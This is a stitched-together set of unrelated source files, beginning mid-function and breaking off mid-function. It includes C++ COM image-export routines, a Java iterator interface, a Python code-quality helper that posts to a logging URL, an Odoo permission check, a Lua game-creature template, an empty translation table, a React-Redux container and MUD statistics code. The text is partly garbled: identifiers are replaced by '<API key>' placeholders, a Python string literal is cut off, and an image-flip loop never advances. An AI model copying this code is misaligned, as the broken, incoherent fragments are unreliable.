memset(pBufferPtr, 0xFF, nCreatedBufferSize);
IUnknown* punkInterface = NULL;
pMediaData->QueryInterface(IID_IUnknown, (void**)&punkInterface);
RELEASEINTERFACE(pMediaData);
return punkInterface;
}
void SaveImage(CString& strFileSrc, CImageInfo& oInfo, LONG __width, LONG __height)
{
OfficeCore::IImageGdipFilePtr pImageFile;
pImageFile.CreateInstance(OfficeCore::<API key>);
BSTR bsSrc = strFileSrc.AllocSysString();
pImageFile->OpenFile(bsSrc);
SysFreeString(bsSrc);
IUnknown* punkFrame = NULL;
pImageFile->get_Frame(&punkFrame);
if (NULL == punkFrame)
punkFrame = CreateEmptyImage(10, 10);
MediaCore::<API key>* pFrame = NULL;
punkFrame->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
RELEASEINTERFACE(punkFrame);
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
if ((lWidth > lMaxSize) || (lHeight > lMaxSize))
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
pImageFile->Resize(lW, lH, 3);
}
LONG lSaveType = 4;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = m_strDstMedia + strSaveItem + _T("jpg");
lSaveType = 3;
}
else
{
strSaveItem = m_strDstMedia + strSaveItem + _T("png");
}
BSTR bsDst = strSaveItem.AllocSysString();
pImageFile->SaveFile(bsDst, lSaveType);
SysFreeString(bsDst);
}
void SaveImage(IUnknown* punkImage, CImageInfo& oInfo, LONG __width, LONG __height)
{
MediaCore::<API key>* pFrame = NULL;
punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
if (NULL == pFrame)
return;
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
OfficeCore::IImageGdipFilePtr pImageFile;
pImageFile.CreateInstance(OfficeCore::<API key>);
pImageFile->put_Frame(punkImage);
LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
if ((lWidth > lMaxSize) || (lHeight > lMaxSize))
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
pImageFile->Resize(lW, lH, 3);
}
LONG lSaveType = 4;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = m_strDstMedia + strSaveItem + _T("jpg");
lSaveType = 3;
}
else
{
strSaveItem = m_strDstMedia + strSaveItem + _T("png");
}
BSTR bsDst = strSaveItem.AllocSysString();
pImageFile->SaveFile(bsDst, lSaveType);
SysFreeString(bsDst);
}
#else
void SaveImage(CString& strFileSrc, CImageInfo& oInfo, LONG __width, LONG __height)
{
CString strLoadXml = _T("<transforms><ImageFile-LoadImage sourcepath=\"") + strFileSrc + _T("\"/></transforms>");
ImageStudio::IImageTransforms* pTransform = NULL;
CoCreateInstance(ImageStudio::<API key>, NULL, <API key>, ImageStudio::<API key>, (void**)&pTransform);
VARIANT_BOOL vbRes = VARIANT_FALSE;
BSTR bsLoad = strLoadXml.AllocSysString();
pTransform->SetXml(bsLoad, &vbRes);
SysFreeString(bsLoad);
pTransform->Transform(&vbRes);
VARIANT var;
var.punkVal = NULL;
pTransform->GetResult(0, &var);
if (NULL == var.punkVal)
{
RELEASEINTERFACE(pTransform);
return;
}
MediaCore::<API key>* pFrame = NULL;
var.punkVal->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
RELEASEINTERFACE((var.punkVal));
if (NULL == pFrame)
{
RELEASEINTERFACE(pTransform);
return;
}
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = _T("<<API key> destinationpath=\"") + m_strDstMedia + strSaveItem + _T("jpg\" format=\"888\"/>");
}
else
{
strSaveItem = _T("<ImageFile-SaveAsPng destinationpath=\"") + m_strDstMedia + strSaveItem + _T("png\" format=\"888\"/>");
}
CString strXml = _T("");
LONG lMaxSize = min(max(lWidth, lHeight), m_lMaxSizeImage);
if ((lWidth <= lMaxSize) && (lHeight <= lMaxSize))
{
strXml = _T("<transforms>") + strSaveItem + _T("</transforms>");
}
else
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
CString strResize = _T("");
strResize.Format(_T("<<API key> type=\"65536\" width=\"%d\" height=\"%d\"/>"), lW, lH);
strXml = _T("<transforms>") + strResize + strSaveItem + _T("</transforms>");
}
VARIANT_BOOL vbSuccess = VARIANT_FALSE;
BSTR bsXml = strXml.AllocSysString();
pTransform->SetXml(bsXml, &vbSuccess);
SysFreeString(bsXml);
pTransform->Transform(&vbSuccess);
RELEASEINTERFACE(pTransform);
}
void SaveImage(IUnknown* punkImage, CImageInfo& oInfo, LONG __width, LONG __height)
{
MediaCore::<API key>* pFrame = NULL;
punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
if (NULL == pFrame)
return;
LONG lWidth = 0;
LONG lHeight = 0;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
oInfo.m_eType = GetImageType(pFrame);
RELEASEINTERFACE(pFrame);
ImageStudio::IImageTransforms* pTransform = NULL;
CoCreateInstance(ImageStudio::<API key>, NULL ,<API key>, ImageStudio::<API key>, (void**)&pTransform);
VARIANT var;
var.vt = VT_UNKNOWN;
var.punkVal = punkImage;
pTransform->SetSource(0, var);
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
if (itJPG == oInfo.m_eType)
{
strSaveItem = _T("<<API key> destinationpath=\"") + m_strDstMedia + strSaveItem + _T("jpg\" format=\"888\"/>");
}
else
{
strSaveItem = _T("<ImageFile-SaveAsPng destinationpath=\"") + m_strDstMedia + strSaveItem + _T("png\" format=\"888\"/>");
}
LONG lMaxSize = min(max(__width, __height), m_lMaxSizeImage);
CString strXml = _T("");
if ((lWidth <= lMaxSize) && (lHeight <= lMaxSize))
{
strXml = _T("<transforms>") + strSaveItem + _T("</transforms>");
}
else
{
LONG lW = 0;
LONG lH = 0;
double dAspect = (double)lWidth / lHeight;
if (lWidth >= lHeight)
{
lW = lMaxSize;
lH = (LONG)((double)lW / dAspect);
}
else
{
lH = lMaxSize;
lW = (LONG)(dAspect * lH);
}
CString strResize = _T("");
strResize.Format(_T("<<API key> type=\"65536\" width=\"%d\" height=\"%d\"/>"), lW, lH);
strXml = _T("<transforms>") + strResize + strSaveItem + _T("</transforms>");
}
VARIANT_BOOL vbSuccess = VARIANT_FALSE;
BSTR bsXml = strXml.AllocSysString();
pTransform->SetXml(bsXml, &vbSuccess);
SysFreeString(bsXml);
pTransform->Transform(&vbSuccess);
RELEASEINTERFACE(pTransform);
}
#endif
CImageInfo GenerateImageID(IUnknown* punkData, double dWidth, double dHeight)
{
CImageInfo oInfo;
if (NULL == punkData)
return oInfo;
LONG lWidth = (LONG)(dWidth * 96 / 25.4);
LONG lHeight = (LONG)(dHeight * 96 / 25.4);
MediaCore::<API key>* pFrame = NULL;
punkData->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
BYTE* pBuffer = NULL;
LONG lLen = 0;
pFrame->get_Buffer(&pBuffer);
pFrame->get_BufferSize(&lLen);
DWORD dwSum = m_oCRC.Calc(pBuffer, lLen);
CAtlMap<DWORD, CImageInfo>::CPair* pPair = m_mapImageData.Lookup(dwSum);
if (NULL == pPair)
{
++m_lNextIDImage;
oInfo.m_lID = m_lNextIDImage;
SaveImage(punkData, oInfo, lWidth, lHeight);
m_mapImageData.SetAt(dwSum, oInfo);
m_listImages.AddTail(oInfo);
}
else
{
oInfo = pPair->m_value;
}
RELEASEINTERFACE(pFrame);
return oInfo;
}
CImageInfo GenerateImageID(CString& strFileName, double dWidth, double dHeight)
{
CImageInfo oInfo;
CAtlMap<CString, CImageInfo>::CPair* pPair = m_mapImagesFile.Lookup(strFileName);
LONG lWidth = (LONG)(dWidth * 96 / 25.4);
LONG lHeight = (LONG)(dHeight * 96 / 25.4);
if (NULL == pPair)
{
#ifdef <API key>
LONG lImageType = m_oExt.GetImageType(strFileName);
if (1 == lImageType || 2 == lImageType)
{
++m_lNextIDImage;
oInfo.m_lID = m_lNextIDImage;
oInfo.m_eType = (1 == lImageType) ? itWMF : itEMF;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
strSaveItem = m_strDstMedia + strSaveItem;
double dKoef = 100 * 96 / 25.4;
bool bIsSuccess = m_oExt.Convert(strFileName, LONG(dWidth * dKoef), LONG(dHeight * dKoef), strSaveItem + _T("svg"));
if (bIsSuccess)
{
if (itWMF == lImageType)
{
CDirectory::CopyFile(strFileName, strSaveItem + _T("wmf"), NULL, NULL);
}
else
{
CDirectory::CopyFile(strFileName, strSaveItem + _T("emf"), NULL, NULL);
}
m_mapImagesFile.SetAt(strFileName, oInfo);
m_listImages.AddTail(oInfo);
return oInfo;
}
else
{
--m_lNextIDImage;
oInfo.m_eType = itJPG;
}
}
#endif
++m_lNextIDImage;
oInfo.m_lID = m_lNextIDImage;
SaveImage(strFileName, oInfo, lWidth, lHeight);
m_mapImagesFile.SetAt(strFileName, oInfo);
m_listImages.AddTail(oInfo);
}
else
{
oInfo = pPair->m_value;
}
return oInfo;
}
CImageInfo GenerateImageID_2(CString& strFileName, CString& strUrl, double dWidth, double dHeight)
{
CImageInfo oInfo;
LONG lWidth = (LONG)(dWidth * 96 / 25.4);
LONG lHeight = (LONG)(dHeight * 96 / 25.4);
#ifdef <API key>
LONG lImageType = m_oExt.GetImageType(strFileName);
if (1 == lImageType || 2 == lImageType)
{
++m_lNextIDImage;
oInfo.m_lID = m_lNextIDImage;
oInfo.m_eType = (1 == lImageType) ? itWMF : itEMF;
CString strSaveItem = _T("");
strSaveItem.Format(_T("\\image%d."), oInfo.m_lID);
strSaveItem = m_strDstMedia + strSaveItem;
double dKoef = 100 * 96 / 25.4;
bool bIsSuccess = m_oExt.Convert(strFileName, LONG(dWidth * dKoef), LONG(dHeight * dKoef), strSaveItem + _T("svg"));
if (bIsSuccess)
{
if (itWMF == lImageType)
{
CDirectory::CopyFile(strFileName, strSaveItem + _T("wmf"), NULL, NULL);
}
else
{
CDirectory::CopyFile(strFileName, strSaveItem + _T("emf"), NULL, NULL);
}
m_mapImagesFile.SetAt(strFileName, oInfo);
m_listImages.AddTail(oInfo);
return oInfo;
}
else
{
--m_lNextIDImage;
oInfo.m_eType = itJPG;
}
}
#endif
++m_lNextIDImage;
oInfo.m_lID = m_lNextIDImage;
SaveImage(strFileName, oInfo, lWidth, lHeight);
m_mapImagesFile.SetAt(strUrl, oInfo);
m_listImages.AddTail(oInfo);
return oInfo;
}
ImageType GetImageType(MediaCore::<API key>* pFrame)
{
if (2 == m_lDstFormat)
return itJPG;
LONG lWidth = 0;
LONG lHeight = 0;
BYTE* pBuffer = NULL;
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
pFrame->get_Buffer(&pBuffer);
BYTE* pBufferMem = pBuffer + 3;
LONG lCountPix = lWidth * lHeight;
for (LONG i = 0; i < lCountPix; ++i, pBufferMem += 4)
{
if (255 != *pBufferMem)
return itPNG;
}
return itJPG;
}
void FlipY(IUnknown* punkImage)
{
if (NULL == punkImage)
return;
MediaCore::<API key>* pFrame = NULL;
punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
if (NULL == pFrame)
return;
BYTE* pBuffer = NULL;
LONG lWidth = 0;
LONG lHeight = 0;
LONG lStride = 0;
pFrame->get_Buffer(&pBuffer);
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
pFrame->get_Stride(0, &lStride);
if (lStride < 0)
lStride = -lStride;
if ((lWidth * 4) != lStride)
{
RELEASEINTERFACE(pFrame);
return;
}
BYTE* pBufferMem = new BYTE[lStride];
BYTE* pBufferEnd = pBuffer + lStride * (lHeight - 1);
LONG lCountV = lHeight / 2;
for (LONG lIndexV = 0; lIndexV < lCountV; ++lIndexV)
{
memcpy(pBufferMem, pBuffer, lStride);
memcpy(pBuffer, pBufferEnd, lStride);
memcpy(pBufferEnd, pBufferMem, lStride);
pBuffer += lStride;
pBufferEnd -= lStride;
}
RELEASEARRAYOBJECTS(pBufferMem);
RELEASEINTERFACE(pFrame);
}
void FlipX(IUnknown* punkImage)
{
if (NULL == punkImage)
return;
MediaCore::<API key>* pFrame = NULL;
punkImage->QueryInterface(MediaCore::<API key>, (void**)&pFrame);
if (NULL == pFrame)
return;
BYTE* pBuffer = NULL;
LONG lWidth = 0;
LONG lHeight = 0;
LONG lStride = 0;
pFrame->get_Buffer(&pBuffer);
pFrame->get_Width(&lWidth);
pFrame->get_Height(&lHeight);
pFrame->get_Stride(0, &lStride);
if (lStride < 0)
lStride = -lStride;
if ((lWidth * 4) != lStride)
{
RELEASEINTERFACE(pFrame);
return;
}
DWORD* pBufferDWORD = (DWORD*)pBuffer;
LONG lW2 = lWidth / 2;
for (LONG lIndexV = 0; lIndexV < lHeight; ++lIndexV)
{
DWORD* pMem1 = pBufferDWORD;
DWORD* pMem2 = pBufferDWORD + lWidth - 1;
LONG lI = 0;
while (lI < lW2)
{
DWORD dwMem = *pMem1;
*pMem1++ = *pMem2;
*pMem2-- = dwMem;
}
}
RELEASEINTERFACE(pFrame);
}
};
} |
package com.rapidminer.example;
import java.util.Iterator;
/**
* An ExampleReader iterates over a sequence of examples. Please note, that although this interface
* extends Iterator<Example>, the method remove() is usually not supported. Invocing remove will
* lead to an {@link java.lang.<API key>} in most cases.
*
* @author Simon Fischer, Ingo Mierswa
*/
public interface ExampleReader extends Iterator<Example> {
} |
#!/usr/bin/env python
# Aid tools to quality checker.
# Qchecklib
# Eliane Araujo, 2016
import os
import sys
import commands
import json
try:
from cc import measure_complexity
except ImportError:
print("tst quality checker needs cc.py to work.")
sys.exit(1)
try:
sys.path.append('/usr/local/bin/radon/')
from radon.raw import *
from radon.complexity import *
from radon.metrics import *
except ImportError:
print("tst quality checker needs radon to work.")
sys.exit(1)
try:
import urllib.request as urlrequest
except ImportError:
import urllib as urlrequest
url = 'http://qchecklog.appspot.com/api/action/'
def four_metrics(program_name):
return "%s %s %s %s" % ( lloc(program_name), cc(program_name), vhalstead(program_name), pep8(program_name)["count"])
def pep8count(program):
return int(pep8(program)[0])
def pep8(program):
result = []
cmd = 'pycodestyle.py --select=E --count ' + program
try:
pep_errors = commands.getoutput(cmd)
except ImportError:
print("tst quality checker needs pycodestyle.py to work.")
sys.exit(1)
if pep_errors:
for error in pep_errors.splitlines():
if error.isdigit():
result.insert(0, int(error))
break
#remove filename from message.
#Example:
#reference.py:15:16: E225 missing whitespace around operator
result.append( error[error.find(":") + 1:] )
else:
result = [0]
return result
def header_lines(filename):
# Count header's lines
# Consider "coding" and "env" as header
program = open(filename, 'r')
code = program.read()
counter = 0
codelines = code.split("\n")
while codelines[counter].startswith("
counter += 1
program.close()
return counter
def vhalstead(filename):
return halstead_metrics("vol", filename)
def halstead_metrics(options, filename):
#It may be used another options
program = open(filename, 'r')
code = program.read()
if options == 'vol':
h = h_visit(code).volume
else:
h = h_visit(code)
program.close()
return round(h, 2)
def cc(filename):
# Radon complexity method only applies to programs containing classes or functions.
# Using another API to other cases.
program = open(filename, 'r')
code = program.read()
try:
# Use radon
visitor = cc_visit(code)
if len(visitor) <= 0:
# Doesn't have functions or classes.
# Use cc.py
stats = measure_complexity(code)
cc = stats.complexity
else:
cc = 0
for i in range( len(visitor) ):
cc += visitor[i].complexity
except Exception as e:
# Failed
print("qcheck: unable to get cc")
cc = 0
program.close()
return cc
def lloc(filename):
program = open(filename, 'r')
code = program.read()
lines = raw_metrics(code)[1]
program.close()
return lines
def raw_metrics(code):
return analyze(code)
def save(message):
type_ = 'accept'
urlrequest.urlopen(url + type_, data=message)
if __name__ == '__main__':
print("qchecklib is a helper module for tst_qcheck commands") |
# -*- coding: utf-8 -*-
from openerp import api, _, models
from openerp.exceptions import UserError
class MrpBomLine(models.Model):
_inherit = 'mrp.bom.line'
@api.model
def create(self, vals):
if not self.env.user.has_group(
'<API key>.group_manager_ldm'):
raise UserError(_('Error!\nYou do not have privileges to Create'
' Material(s) list.\nCheck with your'
' System Administrator.'))
return super(MrpBomLine, self).create(vals)
@api.one
def write(self, vals):
if not self.env.user.has_group(
'<API key>.group_manager_ldm'):
raise UserError(_('Error!\nYou do not have privileges to Modify'
' Material(s) list.\nCheck with your'
' System Administrator.'))
return super(MrpBomLine, self).write(vals)
@api.multi
def unlink(self):
if not self.env.user.has_group(
'<API key>.group_manager_ldm'):
raise UserError(_('Error!\nYou do not have privileges to Delete'
' Material(s) list.\nCheck with your'
' System Administrator.'))
return super(MrpBomLine, self).unlink() |
hagrin_zeed = Creature:new {
objectName = "",
customName = "Hagrin Zeed",
socialGroup = "townsperson",
faction = "townsperson",
level = 100,
chanceHit = 1,
damageMin = 645,
damageMax = 1000,
baseXp = 9429,
baseHAM = 24000,
baseHAMmax = 30000,
armor = 0,
resists = {0,0,0,0,0,0,0,0,-1},
meatType = "",
meatAmount = 0,
hideType = "",
hideAmount = 0,
boneType = "",
boneAmount = 0,
milk = 0,
tamingChance = 0,
ferocity = 0,
pvpBitmask = NONE,
creatureBitmask = PACK,
optionsBitmask = 136,
diet = HERBIVORE,
templates = {"object/mobile/dressed_hagrin_zeed.iff"},
lootGroups = {},
weapons = {},
<API key> = "<API key>",
attacks = {
}
}
CreatureTemplates:addCreatureTemplate(hagrin_zeed, "hagrin_zeed") |
OC.L10N.register(
"quicknotes",
{
"Quick notes" : "",
"Tag the note" : "",
"Enter tags to organize your note" : "",
"Enter tag name" : "",
"Cancel" : "",
"Done" : "",
"Tags" : "",
"Save" : "",
"Looking for your notes" : "",
"Nothing here. Take your first quick notes" : "",
"Are you sure you want to delete the note?" : "",
"Delete note" : "",
"Unpin note" : "",
"Pin note" : "",
"Do you want to discard the changes?" : "",
"Unsaved changes" : "",
"Select file to attach" : "",
"New note" : "",
"All notes" : "",
"Colors" : "",
"Notes" : "",
"Bold" : "",
"Italic" : "",
"Underline" : "",
"Strikethrough" : "",
"Bulleted list" : "",
"Numbered list" : "",
"Blockquote" : "",
"Clean format" : "",
"Quick notes with a basic rich text" : "",
"No tags found" : "",
"Share note" : "",
"Select the users to share. By default you only share the note. Attachments should be shared from files so they can view it." : "",
"Select the users to share" : "",
"No user found" : "",
"Shared with {user}" : " {user} ",
"Shared by {user}" : " {user} ",
"Delete attachment" : "",
"Attach file" : "",
"Shared" : "",
"Shared with others" : "",
"Shared with you" : "",
"Close" : "",
"Default color for new notes" : "",
"Settings" : ""
},
"nplurals=1; plural=0;"); |
'use strict'
import { connect } from 'react-redux'
import TagList from '../../components/tagList/tagList'
var $ = require('jquery')
const ignoredTags = ['geometry', '_clicked', '_hovered']
const mapStateToProps = (state) => {
const feature = state.selectedFeature.feature
let taglist = []
if (state.selectedFeature.hasFeature) {
Object.keys(feature).forEach(function (key) {
if ($.inArray(key, ignoredTags) > -1) {
return
}
taglist.push({
key: key,
value: feature[key]
})
})
}
return {
tags: taglist
}
}
const FeatureDetails = connect(
mapStateToProps
)(TagList)
export default FeatureDetails |
from . import Checker
class ExactChecker(Checker):
async def check(self, sandbox, task):
output = await sandbox.read("/tmp/output.txt")
task.accepted = output == task.testcase.output
task.verdict = "AC" if task.accepted else "WA" |
#include <cstdio>
#include "core/logging.h"
#include "misc/being.h"
#include "misc/statistics.h"
#include "sys/systemtask.h"
#include "misc/extern.h"
#include "sys/process.h"
GameStats stats;
// statistics for info command
unsigned int gDescriptorUpdates = 0;
unsigned long <API key> = 0;
unsigned int gHBsSinceReboot = 0;
unsigned int gReadThisHB = 0;
unsigned int gWriteThisHB = 0;
unsigned int gMaxReadHB = 0;
unsigned int gMaxWriteHB = 0;
unsigned int gMaxReadRound = 0;
unsigned int gMaxWriteRound = 0;
unsigned int gMaxReadProcess = 0;
unsigned int gMaxWriteProcess = 0;
unsigned long gBytesRead = 0;
unsigned long gBytesSent = 0;
long gold_statistics[MAX_MONEY_TYPE][MAX_IMMORT];
long gold_positive[MAX_MONEY_TYPE][MAX_IMMORT];
TGoldModifier gold_modifier[MAX_MONEY_TYPE];
void <API key>()
{
gold_modifier[GOLD_XFER ].setMM(0.01, 100.0);
gold_modifier[GOLD_INCOME ].setMM(0.25, 100.0);
gold_modifier[GOLD_REPAIR ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP ].setMM(0.01, 100.0);
gold_modifier[GOLD_COMM ].setMM(0.01, 100.0);
gold_modifier[GOLD_HOSPITAL ].setMM(0.01, 100.0);
gold_modifier[GOLD_GAMBLE ].setMM(0.01, 100.0);
gold_modifier[GOLD_RENT ].setMM(0.01, 100.0);
gold_modifier[GOLD_DUMP ].setMM(0.01, 100.0);
gold_modifier[GOLD_TITHE ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_SYMBOL ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_WEAPON ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_ARMOR ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_PET ].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_FOOD ].setMM(0.01, 100.0);
gold_modifier[<API key>].setMM(0.01, 100.0);
gold_modifier[GOLD_SHOP_RESPONSES ].setMM(0.01, 100.0);
}
int init_game_stats(void)
{
int i, j;
FILE *fp;
char buf[256];
stats.<API key>[MOB_STAT] = 2;
stats.<API key>[PC_STAT] = 4;
//stats.equip = 0.7; // this affects the load rate of things
stats.max_exist = 1.2; // this affects the MAX number of a thing allowed
// 1.40 resulted in 16-20 days playtime to L50
// 1.05 resulted in 25-30 day to L50 (4.1)
// 0.80 had reasonable rages for 4.5 beta
// 5.2 will be more challenging
// july 2001 - these stands need to be adjusted for speed changes...
// rounds are slower now, so we need to eat up a 5/3 adjustment
// see comm.h for the first part of the compensation
stats.xp_modif = 0.65; // people had is too easy in 5.0-5.1
//stats.xp_modif = 0.86;
// this affects damage applied.
// it should be used to slow down or speed up fights
// i.e. lowering it causes less damage to be applied, so fights take longer
// c.f. balance notes for complete discussion
// value of 1.0 makes fair fights take about 30 rounds = 90 seconds
// a value of 0.75 should make for 120 second fights
// 5.0-5.1 was too easy and too fast
// people could level to 50 in 2-6 play days
// this should be better for 5.2
stats.damage_modifier = 0.65;
//stats.damage_modifier = 0.86;
if (!(fp = fopen(File::STATS,"r"))) {
vlogf(LOG_BUG, "Unable to open txt/stat file");
return FALSE;
} else {
if (fscanf(fp, "%ld\n", &stats.logins) != 1) {
vlogf(LOG_BUG, "bad stats.logins");
}
if (fscanf(fp, "%d %d\n", &repair_number, &total_help_number) != 2) {
repair_number = 0;
total_help_number = 0;
vlogf(LOG_BUG, "bad repair_number");
vlogf(LOG_BUG, "bad help_number");
}
for (i= 0; i < MAX_IMMORT; i++) {
if (fscanf(fp, " %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
&gold_statistics[GOLD_INCOME][i],
&gold_statistics[GOLD_SHOP][i],
&gold_statistics[GOLD_REPAIR][i],
&gold_statistics[GOLD_COMM][i],
&gold_statistics[GOLD_HOSPITAL][i],
&gold_statistics[GOLD_GAMBLE][i],
&gold_statistics[GOLD_RENT][i],
&gold_statistics[GOLD_TITHE][i],
&gold_statistics[GOLD_SHOP_FOOD][i],
&gold_statistics[<API key>][i],
&gold_statistics[GOLD_SHOP_SYMBOL][i],
&gold_statistics[GOLD_SHOP_ARMOR][i],
&gold_statistics[GOLD_SHOP_WEAPON][i],
&gold_statistics[GOLD_SHOP_PET][i],
&gold_statistics[GOLD_SHOP_RESPONSES][i],
&gold_statistics[GOLD_DUMP][i]) != 16) {
vlogf(LOG_BUG, format("bad gold info, resetting %d") % i);
int j;
for (j = 0; j < MAX_MONEY_TYPE; j++)
gold_statistics[j][i] = 0;
}
if (fscanf(fp, " %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
&gold_positive[GOLD_INCOME][i],
&gold_positive[GOLD_SHOP][i],
&gold_positive[GOLD_REPAIR][i],
&gold_positive[GOLD_COMM][i],
&gold_positive[GOLD_HOSPITAL][i],
&gold_positive[GOLD_GAMBLE][i],
&gold_positive[GOLD_RENT][i],
&gold_positive[GOLD_TITHE][i],
&gold_positive[GOLD_SHOP_FOOD][i],
&gold_positive[<API key>][i],
&gold_positive[GOLD_SHOP_SYMBOL][i],
&gold_positive[GOLD_SHOP_ARMOR][i],
&gold_positive[GOLD_SHOP_WEAPON][i],
&gold_positive[GOLD_SHOP_PET][i],
&gold_positive[GOLD_SHOP_RESPONSES][i],
&gold_positive[GOLD_DUMP][i]) != 16) {
vlogf(LOG_BUG, format("bad gold info, resetting %d") % i);
int j;
for (j = 0; j < MAX_MONEY_TYPE; j++)
gold_positive[j][i] = 0;
}
}
if (fscanf(fp, " %f %f %f %f %f %f %f %f %f %f %f %f %f %f %f %f\n",
&gold_modifier[GOLD_INCOME],
&gold_modifier[GOLD_SHOP],
&gold_modifier[GOLD_REPAIR],
&gold_modifier[GOLD_COMM],
&gold_modifier[GOLD_HOSPITAL],
&gold_modifier[GOLD_GAMBLE],
&gold_modifier[GOLD_RENT],
&gold_modifier[GOLD_TITHE],
&gold_modifier[GOLD_SHOP_FOOD],
&gold_modifier[<API key>],
&gold_modifier[GOLD_SHOP_SYMBOL],
&gold_modifier[GOLD_SHOP_ARMOR],
&gold_modifier[GOLD_SHOP_WEAPON],
&gold_modifier[GOLD_SHOP_PET],
&gold_modifier[GOLD_SHOP_RESPONSES],
&gold_modifier[GOLD_DUMP]) != 16) {
vlogf(LOG_BUG, format("bad gold modifier info, resetting %d") % i);
int j;
for (j = 0; j < MAX_MONEY_TYPE; j++)
gold_modifier[j] = 1.0;
}
<API key>();
if (fscanf(fp, "%f\n", &stats.equip) != 1) {
vlogf(LOG_BUG, "bad value for equipment load rate");
}
for (i = 0; i < 50; i++) {
for (j = 0; j < MAX_CLASSES; j++) {
if (fscanf(fp, "%d %ld ",
&stats.levels[j][i], &stats.time_levels[j][i]) != 2) {
vlogf(LOG_BUG, format("Bad level info, class %d, lev %d") % j % (i+1));
}
}
}
long fl=(long)stats.first_login;
if (fscanf(fp, "%ld\n", &fl) != 1) {
vlogf(LOG_BUG, "Bad first_login info, resetting.");
time_t tnow;
time(&tnow);
stats.first_login = tnow;
stats.logins = 0;
}
fclose(fp);
sprintf(buf, "cp %s %s", File::STATS, File::STATS_BAK);
vsystem(buf);
return TRUE;
}
}
void save_game_stats(void)
{
FILE *fp;
int i, j;
if ((fp = fopen(File::STATS,"w+")) != NULL) {
fprintf(fp, "%ld\n", stats.logins);
fprintf(fp, "%d %d\n", repair_number, total_help_number);
for (i= 0; i < MAX_IMMORT; i++) {
fprintf(fp, "%ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
gold_statistics[GOLD_INCOME][i],
gold_statistics[GOLD_SHOP][i],
gold_statistics[GOLD_REPAIR][i],
gold_statistics[GOLD_COMM][i],
gold_statistics[GOLD_HOSPITAL][i],
gold_statistics[GOLD_GAMBLE][i],
gold_statistics[GOLD_RENT][i],
gold_statistics[GOLD_TITHE][i],
gold_statistics[GOLD_SHOP_FOOD][i],
gold_statistics[<API key>][i],
gold_statistics[GOLD_SHOP_SYMBOL][i],
gold_statistics[GOLD_SHOP_ARMOR][i],
gold_statistics[GOLD_SHOP_WEAPON][i],
gold_statistics[GOLD_SHOP_PET][i],
gold_statistics[GOLD_SHOP_RESPONSES][i],
gold_statistics[GOLD_DUMP][i]);
fprintf(fp, "%ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld %ld\n",
gold_positive[GOLD_INCOME][i],
gold_positive[GOLD_SHOP][i],
gold_positive[GOLD_REPAIR][i],
gold_positive[GOLD_COMM][i],
gold_positive[GOLD_HOSPITAL][i],
gold_positive[GOLD_GAMBLE][i],
gold_positive[GOLD_RENT][i],
gold_positive[GOLD_TITHE][i],
gold_positive[GOLD_SHOP_FOOD][i],
gold_positive[<API key>][i],
gold_positive[GOLD_SHOP_SYMBOL][i],
gold_positive[GOLD_SHOP_ARMOR][i],
gold_positive[GOLD_SHOP_WEAPON][i],
gold_positive[GOLD_SHOP_PET][i],
gold_positive[GOLD_SHOP_RESPONSES][i],
gold_positive[GOLD_DUMP][i]);
}
fprintf(fp, "%.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f\n",
gold_modifier[GOLD_INCOME].getVal(),
gold_modifier[GOLD_SHOP].getVal(),
gold_modifier[GOLD_REPAIR].getVal(),
